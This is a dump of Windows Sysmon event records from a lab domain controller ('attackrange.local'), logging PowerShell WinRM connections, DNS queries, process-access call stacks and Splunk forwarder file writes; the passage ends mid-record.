354300x80000000000000001697553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.351{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55164-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local5985- 354300x80000000000000001697552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.226{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55163-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local5985- 354300x80000000000000001697551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.226{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55163-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local5985- 22542200x80000000000000001697550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.233{05ADC7E1-70ED-603D-7488-00000000AD01}5596win-dc-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001697549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:43.630{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:43.630{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:43.630{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001697546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.067{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55162-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local5985- 22542200x80000000000000001697545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.071{05ADC7E1-70ED-603D-7488-00000000AD01}5596win-dc-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000001697544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.067{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55162-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local5985- 10341000x80000000000000001697543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:43.630{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:43.630{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:43.630{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.849{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CAD386D47D1A59F78720F785C8030E0,SHA256=C83BBB49280C587E21DF3E8C2525287D2809D698D7DB00D565307EF6CBA234E8,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001697577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:36.770{05ADC7E1-70ED-603D-7488-00000000AD01}5596WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001697576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.672{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:36.769{05ADC7E1-70ED-603D-7488-00000000AD01}5596WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001697574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.670{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:36.761{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.669{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:36.759{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.669{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.602{05ADC7E1-70ED-603D-7488-00000000AD01}5596WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001697568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.667{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.531{05ADC7E1-70ED-603D-7488-00000000AD01}5596WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001697566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.665{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.507{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.664{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.505{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.663{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.359{05ADC7E1-70ED-603D-7488-00000000AD01}5596win-dc-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001697560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.661{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001697559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:35.351{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55164-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local5985- 10341000x80000000000000001697558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.411{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.411{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.396{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A8DBAA81436F8EFF5EA21D42041A5755,SHA256=935457B4F596FFF8F69AEAE3E4996322199DF8356CCC095F01D031AB41092211,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.396{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87E8C386E433AD7604B53A2D586ECDA9,SHA256=0A8450CFAD5CFD0C0C7368E5C116A000AE04217F6F98FE91B4A15B77B3BFD1C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.927{05ADC7E1-70ED-603D-7488-00000000AD01}5596ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.927{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D96F37F126AD5D5F8F21274FF097B9B,SHA256=DC871B17574100C6F978E67A4710FF1EAC1A7F581119F404233C06F5EE8DE116,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.911{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\kerberos.DLL+8cb5a|C:\Windows\system32\kerberos.DLL+42a18|C:\Windows\system32\kerberos.DLL+40fbb|C:\Windows\system32\kerberos.DLL+148cf|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000001697582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 